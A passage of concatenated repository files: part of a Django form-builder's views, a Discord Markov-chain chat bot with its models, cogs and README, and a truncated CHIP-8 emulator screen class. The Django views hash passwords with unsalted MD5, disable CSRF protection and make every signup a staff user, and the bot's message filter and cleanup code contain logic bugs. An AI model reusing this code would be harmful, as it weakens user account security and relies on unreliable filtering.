request.user.is_authenticated():\n\t\t\tlogout(request)\n\t\tuser_email = request.POST.get('email')\n\t\tuser_pass = request.POST.get('password')\n\t\tuser_firstname = request.POST.get('firstname')\n\t\tuser_lastname = request.POST.get('lastname')\n\t\tuser_list = User.objects.filter(username = user_email)\n\t\tif len(user_list) !=0 :\n\t\t\treturn render_to_response('signup.html',{'errormsg':'User already registered!!'})\n\t\telse:\n\t\t\tuser = User.objects.create_user(username=user_email,password=user_pass,email=user_email,first_name=user_firstname,last_name=user_lastname)\n\t\t\tuser.is_staff = True\n\t\t\tuser.groups.add(Group.objects.get(name='norm_users'))\n\t\t\tuser.save()\n\t\t\tnew_pass = hashlib.md5(user_pass).hexdigest()\n\t\t\tform_new_user = user_table(username=user_email,password=new_pass)\n\t\t\tform_new_user.save()\n\t\t\tuser_group = group_table.objects.get(permissions=1)\n\t\t\tnew_user_obj = user_info(user=form_new_user,first_name=user_firstname,last_name=user_lastname,group=user_group)\n\t\t\tnew_user_obj.save()\n\t\t\treturn HttpResponseRedirect('../login/')\n\n\n@csrf_exempt\ndef fill_form(request,**kwargs):\n\tif request.method == 'GET':\n\t\tform_hash_id = kwargs.get('form_hash')\n\t\tf_obj = form_object_table.objects.filter(form_url = form_hash_id)\n\t\tif len(f_obj) is 0 :\n\t\t\traise Http404('Form Not Found.')\n\t\tif f_obj[0].flag is False:\n\t\t\traise Http404('Form not active.')\n\t\telse:\n\t\t\tf_obj = f_obj[0]\n\t\t\tf_elements = elements_table.objects.filter(form_object = f_obj).order_by('priority')\n\t\t\tf_title = f_obj.form_title\n\t\t\tf_desc = f_obj.form_description\n\t\t\trender_list = list()\n\t\t\tfor ele in f_elements:\n\t\t\t\tndict = dict()\n\t\t\t\tndict['title'] = ele.title\n\t\t\t\tndict['description'] = ele.description\n\t\t\t\tndict['required'] = ele.required\n\t\t\t\tndict['input_type'] = ele.Input.input_type \n\t\t\t\tchoice_vals = list()\n\t\t\t\tif ele.Input.input_type == 'radio' or ele.Input.input_type == 'select':\n\t\t\t\t\tchoices = choice.objects.filter(elements=ele)\n\t\t\t\t\tfor choice_v in choices:\n\t\t\t\t\t\tchoice_vals.append(choice_v.choice_description)\n\t\t\t\tndict['choices'] = choice_vals\n\t\t\t\tndict['id']= ele.elements_id\n\t\t\t\trender_list.append(ndict)\n\t\t\treturn render_to_response('display.html',{'title':f_title,'description':f_desc,'elements':render_list})\n\n\tif request.method == 'POST':\n\t\tform_hash_id = kwargs.get('form_hash')\n\t\tf_obj = form_object_table.objects.filter(form_url = form_hash_id)\n\t\tif len(f_obj) is 0:\n\t\t\traise Http404('Some Error Occured!!')\n\t\telse:\n\t\t\tf_obj = f_obj[0]\n\t\t\tuser_ = None\n\t\t\tif not request.user.is_authenticated():\n\t\t\t\tuser_ = user_table.objects.get(username='[email protected]')\n\t\t\telse:\n\t\t\t\tuser_ = user_table.objects.get(username = request.user.email)\n\t\t\telements_list = elements_table.objects.filter(form_object = f_obj)\n\t\t\tfor elements in elements_list:\n\t\t\t\tele_string = request.POST.get(str(elements.elements_id))\t\n\t\t\t\tresponse = response_object_table(user=user_,form=f_obj.form,elements = elements,response_string = ele_string,response_time=datetime.now())\n\t\t\t\tresponse.save()\n\t\t\treturn render_to_response('thanks.html',{'form_resubmit':request.get_full_path()})\n\n@csrf_exempt\ndef view_form(request, **kwargs):\n\tif not request.user.is_authenticated():\n\t\traise Http404('Please Log in to view the responses for this form')\n\telse:\n\t\t\n\t\tform_hash_id = kwargs.get('form_hash')\n\t\tf_obj = form_object_table.objects.filter(response_url = form_hash_id)\n\t\tif len(f_obj) is 0:\n\t\t\traise Http404('Form not found')\n\t\telse:\n\t\t\tf_obj = f_obj[0]\n\t\t\tresponse_list = response_object_table.objects.filter(form=f_obj.form)\n\t\t\trender_list = list()\n\t\t\telement_list = list()\n\t\t\tfor response in response_list:\n\t\t\t\tif not response.elements.title in element_list:\n\t\t\t\t\telement_list.append(response.elements.title)\n\t\t\tcount=0\n\t\t\telement_dict = dict()\n\t\t\tfor element_title in element_list:\n\t\t\t\tcount = count+1\n\t\t\t\telement_dict[element_title]=''\n\n\t\t\tk=0\n\t\t\tfor response in response_list:\n\t\t\t\tndict = dict()\n\t\t\t\tndict['username'] = response.user.username\n\t\t\t\tfor element_title in element_list:\n\t\t\t\t\tndict[element_title] = ' '\n\t\t\t\telement_dict[response.elements.title] = response.response_string\n\t\t\t\t#ndict[response.elements.title] = response.response_string\n\t\t\t\tndict['Submission Time'] = str(response.response_time)\n\t\t\t\tk=k+1\n\t\t\t\tif count == k:\n\t\t\t\t\tk=0\n\t\t\t\t\tfor element_title in element_list:\n\t\t\t\t\t\tndict[element_title]=element_dict[element_title]\n\t\t\t\t\t'''for p in xrange(0,100):\n\t\t\t\t\t\tndict[str(p)] = '''\n\t\t\t\t\trender_list.append(ndict)\n\t\t\t'''for k in xrange(0,100):\n\t\t\t\tndict = dict()\n\t\t\t\tndict['username'] =' '\n\t\t\t\tfor element_title in element_list:\n\t\t\t\t\tndict[element_title] = ' '\n\t\t\t\tndict['Submission Time'] = ' '\n\t\t\t\tfor p in xrange(0,100):\n\t\t\t\t\tndict[str(p)] = \n\t\t\t\trender_list.append(ndict)'''\n\t\t\t\n\t\t\treturn render_to_response('spreadsheet.html',{'form_title':f_obj.form_title, 'response':json.dumps(render_list)})\n" } ]
6
johnvictorfs/talk_bot
https://github.com/johnvictorfs/talk_bot
992dc2d1ea98cdc2007ca5ffe591c92824c87686
a5905b88114139bf33889ab935364a686b7a9dc9
7d8df966eca73eafc444c833ed00a0912ddd2f19
refs/heads/master
2020-04-23T09:51:57.045795
2019-02-24T00:25:39
2019-02-24T00:25:39
171,084,015
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6243868470191956, "alphanum_fraction": 0.6370006799697876, "avg_line_length": 35.589744567871094, "blob_id": "a7ee46a2d53c8dfc9845b3094e6521c5f68e4ea2", "content_id": "9fa409ec5ff6f178d7ce64e6afdb745bb95f1878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2854, "license_type": "no_license", "max_line_length": 115, "num_lines": 78, "path": "/talk_bot/cogs/management.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import re\n\nfrom discord.ext import commands\n\nfrom talk_bot.orm.models import IgnoredChannel\n\n\nclass ManagementCommands(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.has_permissions(manage_channels=True)\n @commands.command(aliases=['ignore'])\n async def ignore_channel(self, ctx: commands.Context, channel_str: str):\n \"\"\"\n Ignores a channel so new messages from it are not stored in the bot's database\n\n Requires:\n Permissions:\n - Manage Server\n \"\"\"\n\n # Searches for channel id in string like'<#546528012430999552>'\n channel_id = re.search(r'\\d+', channel_str)\n\n if not channel_id:\n return await ctx.send(f'Invalid Channel: {channel_str}')\n\n channel_id = int(channel_id.group())\n channel = self.bot.get_channel(channel_id)\n if not channel:\n return await ctx.send(f'Invalid Channel: {channel_str}')\n\n # Only allow a channel to be ignored if the ignore command was sent in the same guild as that channel\n if channel in ctx.guild.channels:\n ignored, created = IgnoredChannel.get_or_create(channel_id=channel_id)\n if not created:\n return await ctx.send(f'Channel <#{channel_id}> is already ignored.')\n return await ctx.send(f'Channel <#{channel_id}> ignored successfully.')\n else:\n return await ctx.send(\"You can only ignore channels from the same server you're sending this command.\")\n\n @commands.has_permissions(manage_channels=True)\n @commands.command(aliases=['unignore'])\n async def unignore_channel(self, ctx: commands.Context, channel_str: str):\n \"\"\"\n Un-ignores a channel so new messages from it are again stored in the bot's database\n\n Requires:\n Permissions:\n - Manage Server\n \"\"\"\n\n # Searches for channel id in string like'<#546528012430999552>'\n channel_id = re.search(r'\\d+', channel_str)\n\n if not channel_id:\n return await ctx.send(f'Invalid Channel: {channel_str}')\n\n channel_id = int(channel_id.group())\n channel = IgnoredChannel.get(IgnoredChannel.channel_id == channel_id)\n if not channel:\n return await ctx.send(f'Channel <#{channel_id}> is already not being ignored.')\n\n IgnoredChannel.delete().where(IgnoredChannel.channel_id == channel_id).execute()\n return await ctx.send(f'Channel <#{channel_id}> is no longer being ignored.')\n\n @commands.is_owner()\n @commands.command()\n async def clean_db(self, ctx: commands.Context):\n await ctx.send(\"Cleaning the bot's database...\")\n await self.bot.clean_db()\n return await ctx.send(\"Sucessfully cleaned the bot's database.\")\n\n\ndef setup(bot):\n bot.add_cog(ManagementCommands(bot))\n" }, { "alpha_fraction": 0.550761878490448, "alphanum_fraction": 0.5568395853042603, "avg_line_length": 38.33333206176758, "blob_id": "e6e4f1557fe2c1bfc13cdc67257fb432397fcd89", "content_id": "21a305e25ee8df1806192f2441bc0797f121c09d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11682, "license_type": "no_license", "max_line_length": 115, "num_lines": 297, "path": "/talk_bot/bot.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import re\nimport sys\nimport json\nimport asyncio\nimport logging\nimport datetime\nfrom pathlib import Path\n\nimport discord\nfrom discord.ext import commands\n\nfrom talk_bot.orm.models import db, Message, IgnoredChannel\nfrom talk_bot.tasks.sender import send_messages\n\n\ndef load_settings() -> dict:\n \"\"\"\n Loads bot settings from 'settings.json' file\n\n Example settings file at 'settings.example.json'\n \"\"\"\n with open('settings.json', 'r') as f:\n return json.load(f)\n\n\nclass Bot(commands.Bot):\n def __init__(self, settings: dict):\n super().__init__(command_prefix=settings.get('prefix'), case_insensitive=True)\n self.settings = settings\n self.start_time = None\n self.app_info = None\n\n self.db_setup()\n self.remove_command('help')\n self.loop.create_task(self.track_start())\n self.loop.create_task(self.load_all_extensions())\n\n async def track_start(self):\n \"\"\"\n Waits for the bot to connect to discord and then records the time\n \"\"\"\n await self.wait_until_ready()\n self.start_time = datetime.datetime.utcnow()\n\n async def load_all_extensions(self):\n \"\"\"\n Attempts to load all .py files in /cogs/ as cog extensions\n \"\"\"\n await self.wait_until_ready()\n await asyncio.sleep(1) # ensure that on_ready has completed and finished printing\n disabled = ['__init__']\n cogs = [x.stem for x in Path('cogs').glob('*.py') if x.stem not in disabled]\n for extension in cogs:\n try:\n self.load_extension(f'cogs.{extension}')\n print(f'Loaded extension: {extension}')\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'Failed to load extension {error}')\n print('-' * 10)\n\n async def on_ready(self):\n \"\"\"\n This event is called every time the bot connects or resumes connection.\n \"\"\"\n print('-' * 10)\n self.app_info = await self.application_info()\n print(f'Logged in as: {self.user.name}\\n'\n f'Using discord.py version: {discord.__version__}\\n'\n f'Owner: {self.app_info.owner}\\n'\n f'Prefix: {self.settings.get(\"prefix\")}\\n'\n f'Template Maker: SourSpoon / Spoon#7805')\n print('-' * 10)\n try:\n channel = self.get_channel(int(self.settings.get('messages_channel')))\n except (TypeError, ValueError):\n print(f'Error: Invalid messages channel: {self.settings.get(\"messages_channel\")}')\n sys.exit(1)\n try:\n delay = int(self.settings.get('messages_delay'))\n except (TypeError, ValueError):\n print(f'Error: Invalid messages delay: {self.settings.get(\"messages_delay\")}')\n sys.exit(1)\n self.loop.create_task(send_messages(channel, delay))\n await self.populate_db()\n\n async def on_message(self, message: discord.Message):\n \"\"\"\n This event triggers on every message received by the bot\n \"\"\"\n if message.author.bot:\n return # Ignore all bot messages\n # Only allow messages sent on a guild\n if message.guild:\n self.add_message(message)\n await self.process_commands(message)\n\n async def send_logs(self, e: Exception, tb: str, ctx: commands.Context = None):\n \"\"\"\n Sends logs of errors to the bot's instance owner as a private Discord message\n \"\"\"\n owner = self.app_info.owner\n separator = (\"_\\\\\" * 15) + \"_\"\n info_embed = None\n if ctx:\n info_embed = discord.Embed(title=\"__Error Info__\", color=discord.Color.dark_red())\n info_embed.add_field(name=\"Message\", value=ctx.message.content, inline=False)\n info_embed.add_field(name=\"By\", value=ctx.author, inline=False)\n info_embed.add_field(name=\"In Guild\", value=ctx.guild, inline=False)\n info_embed.add_field(name=\"In Channel\", value=ctx.channel, inline=False)\n try:\n await owner.send(content=f\"{separator}\\n**{e}:**\\n```python\\n{tb}```\", embed=info_embed)\n except discord.errors.HTTPException:\n logging.error(f\"{e}: {tb}\")\n try:\n await owner.send(\n content=f\"(Sending first 500 chars of traceback, too long)\\n{separator}\\n**{e}:**\"\n f\"\\n```python\\n{tb[:500]}```\",\n embed=info_embed\n )\n except Exception:\n await owner.send(content=\"Error trying to send error logs.\", embed=info_embed)\n\n def clean_db(self):\n \"\"\"\n Removes all Messages from DB that were sent by a Bot or in a NSFW channel and calls\n Bot.format_message() on the message's content to check for anything else that's wrong\n\n TODO: Refactor this to be non-blocking, currently blocks the bot for ~3 minutes with 17k messages in the DB\n \"\"\"\n for message in Message.select():\n channel = self.get_channel(message.channel_id)\n\n # Deletes message from database if it was sent in a channel that is now ignored\n ignored_channel = Message.select().where(Message.channel_id == channel.id)\n if ignored_channel:\n message.delete()\n continue\n\n # Deletes message if it was sent in a nsfw channel\n if channel:\n if channel.is_nsfw():\n Message.delete().where(Message.channel_id == channel.id)\n continue\n\n message.content = self.clean_message(message.content, message.channel_id)\n message.save()\n author = self.get_user(message.author_id)\n\n # Deletes message if it was sent by a bot\n if author:\n if author.bot:\n Message.delete().where(Message.author_id == author.id)\n\n def is_valid_message(self, message: discord.Message) -> bool:\n \"\"\"\n Checks if a message is valid to be put in the bot's database\n\n The message needs to be:\n - Sent in a not NSFW channel\n - From a non-bot user\n - Have 10 characters or higher\n - Not start with the bot's command prefix\n - Sent in a not ignored channel\n \"\"\"\n if message.channel.is_nsfw():\n return False\n if message.author.bot:\n return False\n if len(message.content) < 10:\n return False\n command_prefixes = {self.settings.get('prefix'), '!', '?', '+', '.'}\n is_command = (message.content.startswith(prefix) for prefix in command_prefixes)\n if is_command:\n return False\n is_ignored = IgnoredChannel.select().where(IgnoredChannel.channel_id == message.channel.id)\n if is_ignored:\n return False\n return True\n\n def add_message(self, message: discord.Message):\n \"\"\"\n Adds message details to database if:\n - If it wasn't sent in a NSFW channel\n - If it wasn't send by a bot\n - It it wasn't sent in an ignored channel\n - If it doesn't start with the bot's command prefix\n - If it doesn't have less than 10 characters\n \"\"\"\n if self.is_valid_message(message):\n Message.create(\n message_id=message.id,\n content=message.content,\n author_name=message.author.name,\n author_id=message.author.id,\n channel_id=message.channel.id,\n timestamp=message.created_at\n )\n\n def clean_message(self, content: str, channel_id: int) -> str:\n # Replaces all mentions to other users or roles in messages with just the names of the user\n # the mention was referring to\n # Also wraps @everyone and @here in in-line code so they don't mention anyone\n # Mentions to users are formatted like so: <@546527580715745290>\n # Mentions to roles are formatted like so: <@&546527580715745290>\n\n user_mentions = re.findall(r'(<@\\d+>)', content)\n for mention in user_mentions:\n user_id = re.search(r'\\d+', mention)\n user_id = user_id.group()\n user: discord.Member = self.get_user(int(user_id))\n if user:\n content = content.replace(mention, user.display_name)\n else:\n content = content.replace(mention, '')\n\n role_mentions = re.findall(r'(<@&\\d+>)', content)\n for mention in role_mentions:\n role_id = re.search(r'\\d+', mention)\n role_id = role_id.group()\n channel: discord.TextChannel = self.get_channel(channel_id)\n guild: discord.Guild = channel.guild\n role: discord.Role = guild.get_role(int(role_id))\n if role:\n content = content.replace(mention, role.name)\n else:\n content = content.replace(mention, '')\n\n content = content.replace('@everyone', '`@everyone`')\n content = content.replace('@here', '`@here`')\n\n return content\n\n async def populate_db(self):\n messages_to_add = []\n for channel in self.get_all_channels():\n # Ignore all channels that are not Text Channels (Like Voice Channels)\n if not type(channel) == discord.TextChannel:\n continue\n try:\n async for message in channel.history(limit=5_000):\n if self.is_valid_message(message):\n content = self.clean_message(message.content, message.channel.id)\n to_add = {\n \"message_id\": message.id,\n \"content\": content,\n \"author_name\": message.author.name,\n \"author_id\": message.author.id,\n \"channel_id\": message.channel.id,\n \"timestamp\": message.created_at\n }\n messages_to_add.append(to_add)\n except Exception:\n pass\n with db.atomic():\n for msg in messages_to_add:\n try:\n Message.insert(**msg).on_conflict(\n conflict_target=(Message.message_id,),\n preserve=(\n Message.message_id,\n Message.author_id,\n Message.author_name,\n Message.channel_id,\n Message.timestamp\n ),\n update={Message.content: msg.get('content')}).execute()\n except Exception as e:\n db.rollback()\n print(f'{e}: {msg}')\n print('Finished populating DB.')\n\n @staticmethod\n def db_setup():\n \"\"\"\n Setup the bot's database, creates necessary tables if not yet created\n \"\"\"\n db.connect()\n db.create_tables([Message, IgnoredChannel])\n db.close()\n\n\nasync def run(settings: dict):\n bot = Bot(settings=settings)\n try:\n await bot.start(settings.get('token'))\n except KeyboardInterrupt:\n await bot.logout()\n except discord.errors.LoginFailure:\n print(f\"Error: Invalid Token. Please input a valid token in '/talk_bot/settings.json' file.\")\n sys.exit(1)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run(settings=load_settings()))\n" }, { "alpha_fraction": 0.6932271122932434, "alphanum_fraction": 0.6932271122932434, "avg_line_length": 24.743589401245117, "blob_id": "773095a69e0d7d2316b8f671f1af4bd832468f73", "content_id": "caeb3ba1097feb7c744696878c0cd49995ac62a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 95, "num_lines": 39, "path": "/talk_bot/orm/models.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import json\n\nimport peewee\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nwith open(os.path.join(BASE_DIR, 'orm', 'db_credentials.json'), 'r') as f:\n credentials = json.load(f)\n\ndb = peewee.PostgresqlDatabase(\n credentials['name'],\n user=credentials['user'],\n password=credentials['password'],\n host=credentials['host'],\n port=credentials['port']\n)\n\n# Uncomment the line below if you wish to use Sqlite instead of Postgres for the bot's database\n# db = peewee.SqliteDatabase('bot.db')\n\n\nclass Message(peewee.Model):\n message_id = peewee.BigIntegerField(null=True, unique=True)\n content = peewee.TextField()\n author_name = peewee.CharField()\n author_id = peewee.BigIntegerField()\n channel_id = peewee.BigIntegerField(null=True)\n timestamp = peewee.DateTimeField(null=True)\n\n class Meta:\n database = db\n\n\nclass IgnoredChannel(peewee.Model):\n channel_id = peewee.BigIntegerField()\n\n class Meta:\n database = db\n" }, { "alpha_fraction": 0.6089193820953369, "alphanum_fraction": 0.6234991550445557, "avg_line_length": 26.11627960205078, "blob_id": "8702586059ed4a439e6022145993cca24b29f208", "content_id": "b9b13e5aaada58d9864503b06c347b90af2da930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1166, "license_type": "no_license", "max_line_length": 92, "num_lines": 43, "path": "/talk_bot/tasks/sender.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import asyncio\nimport random\n\nimport discord\n\nfrom talk_bot.orm.models import Message\n\n\ndef make_pairs(data):\n for i in range(len(data) - 1):\n yield (data[i], data[i + 1])\n\n\ndef get_words() -> list:\n \"\"\"\n Gets the message content of all messages stored in the bot's database and returns a list\n of all individual words in those messages\n \"\"\"\n messages = Message.select()\n all_words = [m.content.split(' ') for m in messages]\n return [word for message in all_words for word in message]\n\n\ndef make_phrase(size: int = 30) -> str:\n words = get_words()\n pairs = make_pairs(words)\n word_dict = {}\n for word_1, word_2 in pairs:\n if word_1 in word_dict.keys():\n word_dict[word_1].append(word_2)\n else:\n word_dict[word_1] = [word_2]\n chain = [random.choice(words)]\n for i in range(size):\n chain.append(random.choice(word_dict[chain[-1]]))\n return ' '.join(chain)\n\n\nasync def send_messages(channel: discord.TextChannel, delay: int = 5, size: int = 30):\n while True:\n message = make_phrase(size)\n await channel.send(message)\n await asyncio.sleep(60 * delay)\n" }, { "alpha_fraction": 0.7475907802581787, "alphanum_fraction": 0.7487027645111084, "avg_line_length": 57.673912048339844, "blob_id": "b65b3677c392a837faeb39f787cbb2769c0cdf25", "content_id": "ee18325febde18924df5ea27f1a7e70f77ac39f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2698, "license_type": "no_license", "max_line_length": 272, "num_lines": 46, "path": "/README.md", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "# Talk-bot\n\n#### A discord bot that uses Markov chains to generate new messages from the ones the bot reads and sents them in another channel. Made in Python using the [discord.py](https://github.com/Rapptz/discord.py/tree/rewrite) library.\n\n***\n\nThe bot stores all messages from discord channels that he can reach (new or old) in a Postgres Database that were not sent by a Bot or in a NSFW channel (and some other formatting rules). \n\nFrom those messages it then makes up new messages using a markov chain logic and sends them back in a configured channel in `talk_bot/settings.json` every 5 minutes (by default, can be changed in the settings as well). \n\nThe bot could easily be changed to make use of a more robust message history and data to create better messages (perhaps with the use of Machine Learning). The code for creating and sending the messages is present at [`talk_bot/tasks/sender.py`](talk_bot/tasks/sender.py).\n\n***\n\n#### Setup\n\n- The bot requires Python 3.6 or higher to run\n\n- Dependencies are present in the `pyproject.toml` file and can be easily installed with [`poetry`](https://github.com/sdispater/poetry) with `$ poetry install`\n\n- Rename [`talk_bot/orm/db_credentials.example.json`](talk_bot/orm/db_credentials.example.json) to `db_credentials.json` and put in the database credentials for a Postgres database\n - Or, if you wish to use a Sqlite database, uncomment the `db = peewee.SqliteDatabase('bot.db')` line at [`talk_bot/orm/models.py`](talk_bot/orm/models.py)\n\n- Rename [`talk_bot/settings.example.json`](talk_bot/settings.example.json) to `settings.json` and edit in the needed fields\n\n - You can create a discord bot and get its token at https://discordapp.com/developers/applications/ (Do not share your token with anyone!)\n - `messages_channel` needs to be the ID of the channel you want the bot to send the generated messages to, you can get the ID of a channel in Discord by turning on the Developer Mode in the settings, and right-clicking a channel and pressing 'Copy ID'\n - `messages_delay` is the delay (in minutes) between messages the bot sends to the configured channel\n\n***\n\n#### Running\n\n- `$ cd talk_bot`\n- `$ python bot.py`\n\n***\n\n#### Discord Commands\n\n- `!ignore <channel>` Messages from ignored channels are not added to the database (not retro-active)\n - Requires the `Manage Channels` permission\n- `!ignore <channel>` Un-ignores a channel\n - Requires the `Manage channels` permission\n- `!clean_db` Deletes any messages already in the bot's database that don't meet the necessary criteria to be there, also deletes messages that were sent in a channel that is now ignored\n - Can only be used by the bot's instance Owner" }, { "alpha_fraction": 0.6105527877807617, "alphanum_fraction": 0.6482412219047546, "avg_line_length": 21.11111068725586, "blob_id": "20cadcb66ad38c225cab7f1c605ac22c3b365b6c", "content_id": "6b852795453f6248942625a2ff3838340be1e7e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 398, "license_type": "no_license", "max_line_length": 85, "num_lines": 18, "path": "/pyproject.toml", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"talk-bot\"\nversion = \"0.1.0\"\ndescription = \"\"\nauthors = [\"John Victor <[email protected]>\"]\n\n[tool.poetry.dependencies]\npython = \"^3.6\"\n\"discord.py\" = {git = \"https://github.com/Rapptz/discord.py.git\", branch = \"rewrite\"}\npeewee = \"^3.8\"\npsycopg2-binary = \"^2.7\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^3.0\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n" }, { "alpha_fraction": 0.6008620858192444, "alphanum_fraction": 0.6011494398117065, "avg_line_length": 43.05063247680664, "blob_id": "7777c051412e0a5ae8f3b9b4e0cd7ce90eb60d22", "content_id": "31f883e04bb8e46da23a7e1bdee631bc7d2d3b28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3480, "license_type": "no_license", "max_line_length": 119, "num_lines": 79, "path": "/talk_bot/cogs/error_handler.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import traceback\nimport datetime\nimport logging\n\nimport discord\nfrom discord.ext import commands\n\n\nclass CommandErrorHandler(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @staticmethod\n async def bot_check(ctx: commands.Context, **kwargs):\n \"\"\"This runs at the start of every command\"\"\"\n await ctx.trigger_typing()\n time = datetime.datetime.utcnow()\n msg = f\"'{ctx.command}' ran by '{ctx.author}' as '{ctx.invoked_with}' at {time}. with '{ctx.message.content}'\"\n logging.info(msg)\n print(msg)\n return True\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx: commands.Context, error: Exception):\n prefix = self.bot.settings.get('prefix')\n arguments_error = [\n commands.MissingRequiredArgument,\n commands.BadArgument,\n commands.TooManyArguments,\n ]\n command = None\n arguments = None\n if any([isinstance(error, arg_error) for arg_error in arguments_error]):\n if ctx.command.qualified_name == 'ignore':\n command = \"ignore\"\n arguments = f\"`<channel>`\"\n elif ctx.command.qualified_name == 'unignore':\n command = \"unignore\"\n arguments = f\"`<channel>`\"\n embed = discord.Embed(\n title=f\"Usage of command '{command}'\",\n description=f\"`<argument>` : Obrigatory\\n`(argument|default)` : Optional\\n\\n\"\n f\"{prefix}{command} {arguments}\\n\",\n color=discord.Colour.blue()\n )\n try:\n await ctx.send(embed=embed)\n except discord.errors.Forbidden:\n await ctx.send(\"Erro. Not enough permissions to send an embed.\")\n elif isinstance(error, commands.CommandNotFound):\n pass\n elif isinstance(error, commands.DisabledCommand):\n await ctx.send(\"This command is disabled.\")\n elif isinstance(error, commands.NoPrivateMessage):\n await ctx.send(\"This command can not be used in private messages.\")\n elif isinstance(error, commands.NotOwner):\n await ctx.send(\"This command can only be used by the bot's owner.\")\n elif isinstance(error, commands.MissingPermissions):\n permissions = [f\"***{perm.title().replace('_', ' ')}***\" for perm in error.missing_perms]\n await ctx.send(f\"You need the following permissions to do that: {', '.join(permissions)}\")\n elif isinstance(error, commands.CommandOnCooldown):\n await ctx.send(\n f\"You already used this comman recently. \"\n f\"Wait another {error.retry_after:.1f}s to use it again\"\n )\n elif isinstance(error, commands.BotMissingPermissions):\n permissions = [f\"***{perm.title().replace('_', ' ')}***\" for perm in error.missing_perms]\n await ctx.send(f\"I need the following permissions to do that: {', '.join(permissions)}\")\n elif isinstance(error, commands.errors.CheckFailure):\n await ctx.send(f\"You don't have permission to do that.\")\n else:\n await ctx.send(f\"Unknown error. The logs of this error have been sent to a Dev and will be fixed shortly.\")\n tb = ''.join(traceback.format_exception(type(error), error, error.__traceback__))\n await self.bot.send_logs(error, tb, ctx)\n\n\ndef setup(bot):\n bot.add_cog(CommandErrorHandler(bot))\n" } ]
7
theyeeman/chip8-emulator
https://github.com/theyeeman/chip8-emulator
36de3cd962b6c8194c970f25b43fa73803cd6238
241ba2d9270060da76c02a2209e22ef7fa0161c8
5d9b9d447d9358fe633ee093ad9b8a2993b0b2b2
refs/heads/master
2023-06-14T20:05:57.650380
2021-07-12T14:20:29
2021-07-12T14:20:29
328,294,578
1
1
null
2021-01-10T03:23:17
2021-01-26T02:33:47
2021-01-28T22:44:00
Python
[ { "alpha_fraction": 0.5161290168762207, "alphanum_fraction": 0.5339038968086243, "avg_line_length": 29.089109420776367, "blob_id": "12de0bc61f02e59b6e93c5514719f9e9caf0eeef", "content_id": "5bea254f51e609f83c18be45ae739e50dd0055f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3038, "license_type": "no_license", "max_line_length": 96, "num_lines": 101, "path": "/.history/screen_20210125204341.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "# Screen class to handle initialization, drawing, and updating.\nfrom pygame import Color, display, draw\n\npixelOff = Color(0, 0, 0, 255)\npixelOn = Color(255, 255, 255, 255)\n\n# (top, left) is (0, 0)\n\nclass chip8_Screen:\n def __init__(self, scale):\n self.width = 64 * scale\n self.height = 32 * scale\n self.scale = scale\n self.pixelMap = []\n\n def initDisplay(self):\n display.init()\n self.surface = display.set_mode([self.width, self.height])\n self.clearScreen()\n self.update()\n\n def clearScreen(self):\n # Set all pixels on screen to off\n self.surface.fill(pixelOff)\n\n def setPixel(self, x, y):\n # Set a pixel in the buffer to be on at a specific x, y location. Need to call update()\n # to actually make it show on screen\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n draw.rect(self.surface, pixelOn, (x_pos, y_pos, self.scale, self.scale))\n\n def resetPixel(self, x, y):\n # Set a pixel in the buffer to be off at a specific x, y location. Need to call update()\n # to actually make it show on screen\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n draw.rect(self.surface, pixelOff, (x_pos, y_pos, self.scale, self.scale))\n\n def getPixel(self, x, y):\n # Return true if pixel at position (x, y) is on\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n pixelState = self.surface.get_at((x_pos, y_pos))\n\n if (pixelState == pixelOff):\n return False\n else:\n return True\n \n def getPixelMap(self):\n # Store the current screen of pixels in a 2D array. Used for save states\n self.pixelMap.clear()\n tempMap = []\n\n for y in range(32):\n for x in range(64):\n if (self.getPixel(x, y)):\n tempMap.append(1)\n else:\n tempMap.append(0)\n self.pixelMap.append(tempMap.copy())\n tempMap.clear()\n\n def byteToPixel(self, x, y, byte):\n # Byte is 8-bits. Return whether pixel was turned off\n setVF = False\n\n for i in range(7, -1, -1):\n mask = 1\n if (byte & (mask << i) != 0):\n # Pixel at (x, y) commanded on\n if (not self.getPixel((x + 7 - i) % 64, y % 32)):\n # Pixel is off, so turn on this pixel\n self.setPixel((x + 7 - i) % 64, y % 32)\n else:\n # Pixel is already on, so turn this pixel off and set v[0xF]\n self.resetPixel((x + 7 - i) % 64, y % 32)\n setVF = True\n \n return setVF\n\n def getWidth(self):\n return self.width\n\n def getHeight(self):\n return self.height\n\n def getScale(self):\n return self.scale\n\n def update(self):\n # Update the screen with the buffer.\n display.flip()\n\n def 